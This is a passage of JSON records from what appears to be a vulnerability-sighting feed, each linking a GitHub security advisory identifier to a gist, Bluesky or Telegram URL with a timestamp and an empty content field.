"vulnerability": "GHSA-2jx3-65f3-xr8r", "type": "seen", "source": "https://gist.github.com/alon710/d087f67b06897a54af2f681ad9224585", "content": "", "creation_timestamp": "2026-06-19T02:11:47.000000Z"}, {"uuid": "0e0c0d5f-7296-43cd-9276-7f7fb1e2d164", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-g7m4-839x-ch6v", "type": "seen", "source": "https://gist.github.com/alon710/9444ec80b5b6b03e92361b8cc9ab95ef", "content": "", "creation_timestamp": "2026-06-19T03:11:39.000000Z"}, {"uuid": "84381591-3e6d-4628-a5bf-85f3d82800e4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-4hpg-mp64-x7xq", "type": "seen", "source": "https://gist.github.com/alon710/b45b870bc10a669d4ff8530bce9819db", "content": "", "creation_timestamp": "2026-06-19T04:21:14.000000Z"}, {"uuid": "dcec0e3d-1d7b-4b34-bfca-b62450d20b0e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-8mg9-j9cf-54cj", "type": "seen", "source": "https://gist.github.com/alon710/e083ed26c473e5302badc99cce623436", "content": "", "creation_timestamp": "2026-06-19T04:41:13.000000Z"}, {"uuid": "d0102233-a00b-4815-bc30-4f340f558119", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-8mg9-j9cf-54cj", "type": "seen", "source": "https://gist.github.com/alon710/21958fb84fc5c64da7368e4899e2b6cf", "content": "", "creation_timestamp": "2026-06-19T05:02:08.000000Z"}, {"uuid": "fe8bea3c-0907-4759-8574-9611ff0979ee", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-rx78-29qr-5hq8", "type": "seen", "source": "https://gist.github.com/alon710/4af676c2ea4b45d148a75b1db05205fb", "content": "", "creation_timestamp": "2026-06-19T05:11:14.000000Z"}, {"uuid": "5b77243d-798d-4841-af31-35bf50ee12e4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-wc84-j36w-pw4x", "type": "seen", "source": "https://gist.github.com/alon710/b863239f1325d87e011dc1044f290c3c", "content": "", "creation_timestamp": "2026-06-19T05:42:26.000000Z"}, {"uuid": "b9b47301-dcef-4861-91ef-55424e53c0b3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-cw4q-gqg5-g38h", "type": "seen", "source": "https://gist.github.com/alon710/303180a576c9b715b0944ef26db287db", "content": "", "creation_timestamp": "2026-06-19T06:12:11.000000Z"}, {"uuid": "1ad905f5-5b6a-481b-b18d-efa0987f20c9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-mpc8-jxjh-qpgh", "type": "seen", "source": "https://gist.github.com/alon710/333afcd685b49ef354fee03c7b82b7fd", "content": "", "creation_timestamp": "2026-06-19T07:11:14.000000Z"}, {"uuid": "85d282b6-5984-4939-8e89-e7b95e4976c8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-24vr-rprv-67rf", "type": "seen", "source": "https://gist.github.com/alon710/98155855dc1ad0c23a241957e18cbd67", "content": "", "creation_timestamp": "2026-06-19T07:42:00.000000Z"}, {"uuid": "f4200cd7-a901-4c10-ad63-7c40c44be816", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-v2ww-5rh7-2h5v", "type": "seen", "source": "https://gist.github.com/alon710/4cbfed841590889a9a5bb73b59d8bf8b", "content": "", "creation_timestamp": "2026-06-19T08:11:42.000000Z"}, {"uuid": "72fbd8e2-b078-4522-bc68-4609d0cdaf49", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-8j37-5w68-wj2g", "type": "seen", "source": "https://gist.github.com/alon710/9745ea7f614dc3dd47451c872d75fca1", "content": "", "creation_timestamp": "2026-06-19T08:41:59.000000Z"}, {"uuid": "b4010f3c-5b35-49e4-91d2-aabbc5377f0d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-72fw-cqh5-f324", "type": "seen", "source": "https://gist.github.com/alon710/0d5ae642ba19f62c45be74e869a28ce0", "content": "", "creation_timestamp": "2026-06-19T09:11:18.000000Z"}, {"uuid": "ab813758-c39d-430d-9a63-25066638c682", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-72fw-cqh5-f324", "type": "seen", "source": "https://gist.github.com/alon710/e9f4de9ef468ec9331512207326f51c3", "content": "", "creation_timestamp": "2026-06-19T09:22:12.000000Z"}, {"uuid": "e387ac4e-8575-469d-bdbc-bd9ea0e6ddbe", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-rwp6-7w3q-75fq", "type": "seen", "source": "https://gist.github.com/alon710/ce6be6956edb730f85105a449ccea809", "content": "", "creation_timestamp": "2026-06-19T09:41:32.000000Z"}, {"uuid": "089710af-8357-4433-9a51-226fd22b05ba", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-8c59-hr4w-qg69", "type": "seen", "source": "https://gist.github.com/alon710/f7dddc065a286d49734bb0de9451848c", "content": "", "creation_timestamp": "2026-06-19T11:11:26.000000Z"}, {"uuid": "e21c021f-de23-4f48-983a-3b5318d0fa65", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-8c59-hr4w-qg69", "type": "seen", "source": "https://gist.github.com/alon710/be9211ec3a305ce39ef3284bab7182dd", "content": "", "creation_timestamp": "2026-06-19T11:22:09.000000Z"}, {"uuid": "8f46675d-ed7c-45be-a350-5b59f8313e03", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-8c59-hr4w-qg69", "type": "seen", "source": "https://gist.github.com/alon710/23ca157b1ad763d563384387e7bf55a3", "content": "", "creation_timestamp": "2026-06-19T11:46:12.000000Z"}, {"uuid": "c27b7973-f03b-4f21-be04-b4e686851636", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-PP25-4CG4-QCR9", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/102707", "content": "", "creation_timestamp": "2026-09-19T00:00:10.284546Z"}, {"uuid": "4d93350a-9d52-4490-9ea5-d8a8b251d582", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-pr6h-vr44-xq8j", "type": "seen", "source": "https://gist.github.com/alon710/cb136280a5e6c30166b773d213dd8673", "content": "", "creation_timestamp": "2026-09-18T23:31:39.238531Z"}, {"uuid": "82d65780-daa2-4d19-aaa7-8cac8633a311", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-vr5f-w35q-98jp", "type": "seen", "source": "https://gist.github.com/alon710/e2d55cbe70e0ef271b1abdc363b67704", "content": "", "creation_timestamp": "2026-09-19T04:31:13.997453Z"}, {"uuid": "12a5a7bc-4d1a-4858-9f7f-18bfa97d337f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-xcw4-53cc-hv32", "type": "seen", "source": "https://gist.github.com/alon710/d69b517a6b95a915db94a084d6dcfcda", "content": "", "creation_timestamp": "2026-09-19T03:31:29.760629Z"}, {"uuid": "4e0fd523-66be-4e67-8c24-02159748cf1a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-9jjc-fw8x-fmwx", "type": "seen", "source": "https://gist.github.com/alon710/6c8180b6898a74f52da1dc6d425e2b77", "content": "", "creation_timestamp": "2026-09-19T02:31:41.196137Z"}, {"uuid": "1db6030e-2783-4195-bbf5-f35e059ff276", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-5gmm-hjfj-8ff7", "type": "seen", "source": "https://gist.github.com/alon710/bf82c581e5c6ef378a50f158be5ff25c", "content": "", "creation_timestamp": "2026-09-19T01:31:56.107728Z"}, {"uuid": "b4124ade-e9a9-4ebe-8d9b-e37009397eeb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-XWMW-PRC4-V3CR", "type": "seen", "source": "https://gist.github.com/alon710/da0a2d4f39c3478c9853ea6e81af7824", "content": "", "creation_timestamp": "2026-09-19T00:32:16.271662Z"}, {"uuid": "ab0ae25a-9e00-4ab8-9564-16430c703196", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-jv2h-4p9v-wf5w", "type": "seen", "source": "https://gist.github.com/alon710/27a1a02d7c391b1b2590b0cf7da6fc5e", "content": "", "creation_timestamp": "2026-06-19T16:11:36.000000Z"}, {"uuid": "49674c42-23ea-4c94-8f4c-8d8a7c1315cd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-vmhf-c436-hxj4", "type": "seen", "source": "https://gist.github.com/alon710/deca315ed07761ee339643a66641a622", "content": "", "creation_timestamp": "2026-06-19T16:42:15.000000Z"}, {"uuid": "49d6bb83-d8b1-4026-9ad1-bf958d83427f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-phwj-rprq-35pp", "type": "seen", "source": "https://gist.github.com/alon710/21026fb050081ef961f3644c807713b6", "content": "", "creation_timestamp": "2026-06-19T17:11:20.000000Z"}, {"uuid": "bec8cd38-6e1f-4cd1-b401-b03128cec71d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-phwj-rprq-35pp", "type": "seen", "source": "https://gist.github.com/alon710/61be013bad9ac90453bf311859cf9464", "content": "", "creation_timestamp": "2026-06-19T17:22:09.000000Z"}, {"uuid": "fbb2fda4-af51-4f40-9c70-bea2f3919bd1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-WFPW-MMFH-QQ69", "type": "seen", "source": "https://gist.github.com/alon710/21b59dad18a8c158a7eeee605d73d87e", "content": "", "creation_timestamp": "2026-06-19T17:42:09.000000Z"}, {"uuid": "0a57bd67-fd01-476f-84fd-e873e3303c19", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-vpr4-p6fq-85jc", "type": "seen", "source": "https://bsky.app/profile/cve.skyfleet.blue/post/3monvvf7aa22k", "content": "", "creation_timestamp": "2026-06-19T17:53:01.637111Z"}, {"uuid": "fb575931-1640-4d2e-86ad-a4e328494f4f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-4xgf-cpjx-pc3j", "type": "seen", "source": "https://gist.github.com/konard/4b48b247d88d1fe3f1e7f6cd34987449", "content": "", "creation_timestamp": "2026-06-20T14:29:23.000000Z"}, {"uuid": "c90bfca9-4a78-45d3-9acc-ae2e82939e92", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "ghsa-gv7w-rqvm-qjhr", "type": "seen", "source": "https://bsky.app/profile/getpacketai.bsky.social/post/3moq4phu47q2d", "content": "", "creation_timestamp": "2026-06-20T15:00:18.676987Z"}, {"uuid": "5d0623b7-a864-4124-ad90-f1141e63a732", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-j496-crgh-34mx", "type": "seen", "source": "https://gist.github.com/blessingblockchain/45445c4e5d457c9c5d721a5fc93ad073", "content": "", "creation_timestamp": "2026-06-20T15:24:39.000000Z"}, {"uuid": "7008e53e-0193-496b-95fc-256963e9100b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-5pmv-rx8r-wmv5", "type": "seen", "source": "https://gist.github.com/Shnatsel/eb0a4be79a0657e4eb67c4f085f991bc", "content": "", "creation_timestamp": "2026-06-20T18:31:03.000000Z"}, {"uuid": "e3a1a376-bfd2-4efb-b8e2-89a0cbb13739", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-4CC2-G9W2-FHF6", "type": "seen", "source": "https://gist.github.com/alon710/d42b4dbefc93b27ac577422cb0d5bd9b", "content": "", "creation_timestamp": "2026-06-21T21:42:12.000000Z"}, {"uuid": "bc22241e-b996-455f-aa3c-cd9f9e6445b7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-mh64-ph39-mrc9", "type": "seen", "source": "https://gist.github.com/alon710/c5b3f5c6eff1ab2b8225ee8d2a46e1e8", "content": "", "creation_timestamp": "2026-06-21T20:11:16.000000Z"}, {"uuid": "02128a2a-0ead-4208-8e11-ee532ed27885", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-C3XH-98XP-6QHF", "type": "seen", "source": "https://gist.github.com/alon710/07ba754de3ce685dc022ade4d0592c92", "content": "", "creation_timestamp": "2026-06-21T19:52:11.000000Z"}, {"uuid": "40543bed-c05a-45a5-bf74-5b8739685da1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-CW6H-FFMH-X6VH", "type": "seen", "source": "https://gist.github.com/alon710/e6564d67c9e3094972e0bf9eb5cc1cf8", "content": "", "creation_timestamp": "2026-06-22T02:42:07.000000Z"}, {"uuid": "d585975b-3ebc-41f3-9318-b95162b42b58", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-WVRH-2F4M-924V", "type": "seen", "source": "https://gist.github.com/alon710/c7e86c644a18ac812b6d13eff8101d8c", "content": "", "creation_timestamp": "2026-06-22T03:32:02.000000Z"}, {"uuid": "b9e0356a-f737-418c-860e-3c59f5b66226", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-WVRH-2F4M-924V", "type": "seen", "source": "https://gist.github.com/alon710/f71625529d1c2c0e0c6b0f02ed674488", "content": "", "creation_timestamp": "2026-06-22T03:21:45.000000Z"}, {"uuid": "574605a6-8eeb-48f9-af9c-4b2f4c3f2838", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-h3m5-97jq-qjrf", "type": "seen", "source": "https://gist.github.com/alon710/2f8edd2e7aeda928380e8cf2e8c29eb1", "content": "", "creation_timestamp": "2026-06-22T03:42:22.000000Z"}, {"uuid": "76547ebb-20b9-435b-bcca-fb9ea6d18e61", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-WVRH-2F4M-924V", "type": "seen", "source": "https://gist.github.com/alon710/18941cf020009371f2f6560347d44c47", "content": "", "creation_timestamp": "2026-06-22T03:42:22.000000Z"}, {"uuid": "29647b55-0c4b-4181-bed3-23b3e725297f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-X975-RGX4-5FH4", "type": "seen", "source": "https://gist.github.com/alon710/5d611a6037648e98f6e55065eed852b3", "content": "", "creation_timestamp": "2026-06-22T04:21:36.000000Z"}, {"uuid": "f190a1e2-c37a-4d95-94f8-f9ff3b48af1f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-X975-RGX4-5FH4", "type": "seen", "source": "https://gist.github.com/alon710/8de6af61b9d07c38419cacde992ae1f8", "content": "", "creation_timestamp": "2026-06-22T04:11:55.000000Z"}, {"uuid": "2b613896-9ea4-4a89-94eb-596819880908", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-C795-2G9C-J48M", "type": "seen", "source": "https://gist.github.com/alon710/7500dd6f480c0fdf8041d9aab0995e28", "content": "", "creation_timestamp": "2026-06-22T04:41:18.000000Z"}, {"uuid": "d53726f5-fac9-4cc2-9961-b5b58214b14f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-C795-2G9C-J48M", "type": "seen", "source": "https://gist.github.com/alon710/83c414f950ca237e756d7395928f3c81", "content": "", "creation_timestamp": "2026-06-22T04:51:34.000000Z"}, {"uuid": "4cb5f7dc-ed24-4db7-a091-a317e7f9c0bb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-V3F4-W7R7-V3HM", "type": "seen", "source": "https://gist.github.com/alon710/c55617deed0f6aa3ac7d480b01fa4253", "content": "", "creation_timestamp": "2026-06-22T05:11:16.000000Z"}, {"uuid": "8505e689-f58d-4aea-956a-f84ffacb2ad7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-6GQW-JQV7-V88M", "type": "seen", "source": "https://gist.github.com/alon710/25e5cb1eacfa8b15e8ccfc6978e0021b", "content": "", "creation_timestamp": "2026-06-22T05:42:09.000000Z"}, {"uuid": "b057be80-ce6b-417c-8be0-54797aca97cd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-3w98-rrpr-fprr", "type": "seen", "source": "https://gist.github.com/alon710/839e5670d8770ce9ac0c8d550d9e25b4", "content": "", "creation_timestamp": "2026-09-18T11:31:11.830440Z"}, {"uuid": "5b63f85d-dbef-43d1-8625-53f28eb0f3e7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-gq9c-wmrm-5hvr", "type": "seen", "source": "https://gist.github.com/alon710/ccdbb258ac65bfe162fcd19f3dfec9e5", "content": "", "creation_timestamp": "2026-09-18T10:32:02.185367Z"}, {"uuid": "ae2b4094-df84-426a-95d1-4c8ed4a8dd4a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-mrg3-qvqr-jw29", "type": "seen", "source": "https://gist.github.com/alon710/b4f0369e3101a49089dd01d5083aac3c", "content": "", "creation_timestamp": "2026-09-18T09:31:38.724956Z"}, {"uuid": "b28f1c9f-6386-45e2-81f3-4cffe9cdb424", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-x424-64qh-5j54", "type": "seen", "source": "https://gist.github.com/alon710/5bae97c112644e43c69dc3ea5005f105", "content": "", "creation_timestamp": "2026-09-18T08:31:51.825500Z"}, {"uuid": "fefcacd3-0370-4b4a-84b9-0f758118c84f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-qrfj-mgw8-j9c6", "type": "seen", "source": "https://gist.github.com/alon710/597e5b2d04a8f95b06b03a350d6e8b1e", "content": "", "creation_timestamp": "2026-09-18T07:31:06.523980Z"}, {"uuid": "1dcbe6e9-b230-45a5-aec4-96d5d19c6b95", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-j934-xhv5-fg8f", "type": "seen", "source": "https://gist.github.com/alon710/320920418b1280f455d87d486f8b865e", "content": "", "creation_timestamp": "2026-09-18T06:30:57.204610Z"}, {"uuid": "792e7aa2-af67-4cbd-8853-1182d9da8180", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-f795-p5jw-j6g2", "type": "seen", "source": "https://gist.github.com/alon710/3c02b26d6c320787bd1ad9415b67e503", "content": "", "creation_timestamp": "2026-09-17T12:31:50.563393Z"}, {"uuid": "c48023a1-c20d-4b1c-b9b2-2a9c0e9a1884", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-c67v-vqrp-m5wj", "type": "seen", "source": "https://gist.github.com/alon710/0d63b7210fa6cfac077576ae0d0c2a4f", "content": "", "creation_timestamp": "2026-09-17T11:31:44.692283Z"}, {"uuid": "b78eb164-dbae-4a30-ac28-9459b47f1ece", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-74P7-6H78-GW8P", "type": "seen", "source": "https://gist.github.com/alon710/ba15b4769d69aa0e2cc9924898cce4e0", "content": "", "creation_timestamp": "2026-06-23T13:51:48.000000Z"}, {"uuid": "3000313c-94c0-435d-84db-52e646c1d053", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-74P7-6H78-GW8P", "type": "seen", "source": "https://gist.github.com/alon710/11eb496838c824b891dd239de0d0e0b4", "content": "", "creation_timestamp": "2026-06-23T13:42:51.000000Z"}, {"uuid": "1a5d4b1c-fe7d-4798-8877-eb412ebc46d8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-8c6h-7g6x-m5x4", "type": "seen", "source": "https://gist.github.com/alon710/b22b0dd984dd927be769bc999880e7f3", "content": "", "creation_timestamp": "2026-06-23T22:42:14.000000Z"}, {"uuid": "69551ce5-f215-46ee-bdab-fcaf66a63b98", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-w2j7-f3c6-g8cw", "type": "seen", "source": "https://gist.github.com/alon710/31eb26fe10a0715b39c427020e06d517", "content": "", "creation_timestamp": "2026-06-24T01:41:39.000000Z"}, {"uuid": "0b989ef0-72d3-42b9-9f8a-21c2d9383ed0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-6f75-x745-xcpr", "type": "seen", "source": "https://gist.github.com/alon710/3da2d0271b4ce13266c6eb8e48512bfd", "content": "", "creation_timestamp": "2026-06-24T02:11:40.000000Z"}, {"uuid": "d8e31578-bc40-44e6-aaa2-54f7b9a97bc3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-w2j7-f3c6-g8cw", "type": "seen", "source": "https://gist.github.com/alon710/5069ba47a341c9374d265742c0ed2c0f", "content": "", "creation_timestamp": "2026-06-24T01:52:32.000000Z"}, {"uuid": "cb5acf17-8b6c-47b1-a459-c4c770e5bf7d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-6f75-x745-xcpr", "type": "seen", "source": "https://gist.github.com/alon710/e0c0df432c86420f7e6e4e56d0b5a192", "content": "", "creation_timestamp": "2026-06-24T02:22:36.000000Z"}, {"uuid": "4c94cd1f-af1a-4ede-a35e-4004f4072b0c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-WCMJ-X466-56MM", "type": "seen", "source": "https://gist.github.com/alon710/930931f8715581f8f0d0a4111bb621a6", "content": "", "creation_timestamp": "2026-06-24T03:42:03.000000Z"}, {"uuid": "b52fcd20-401d-45c0-823a-b6a8829146f0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-44wp-g8f4-f4v5", "type": "seen", "source": "https://gist.github.com/alon710/f3efb3a6eb14f85378da7277ba2da374", "content": "", "creation_timestamp": "2026-06-24T04:42:12.000000Z"}, {"uuid": "605d5ea1-123a-4dfa-ad97-3bacadcad66b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-52fw-7fw2-fmv5", "type": "seen", "source": "https://gist.github.com/alon710/0deb8ac6eb09e699071fdbd4071e986c", "content": "", "creation_timestamp": "2026-06-24T05:42:05.000000Z"}, {"uuid": "e6de719e-14af-4ed9-90eb-366776f15437", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-58fg-62fg-3fcj", "type": "seen", "source": "https://gist.github.com/alon710/e0871f429bd0cd1c539be9054ab3870b", "content": "", "creation_timestamp": "2026-06-24T06:12:05.000000Z"}, {"uuid": "9202a78f-7895-4d61-8120-c0959c965893", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-3fc8-8hp6-6jr4", "type": "seen", "source": "https://gist.github.com/alon710/ef60a8d2e003433e0632a30f0def6b96", "content": "", "creation_timestamp": "2026-06-24T07:11:47.000000Z"}, {"uuid": "fc85a937-e99b-4b63-930d-6a7b55aac3a8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-5w46-g9pq-wh6f", "type": "seen", "source": "https://gist.github.com/alon710/0cc6180222e375f03b77f1081a3811f5", "content": "", "creation_timestamp": "2026-06-24T07:42:24.000000Z"}, {"uuid": "17483c81-4a08-4ab6-b932-888501bfee6b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", 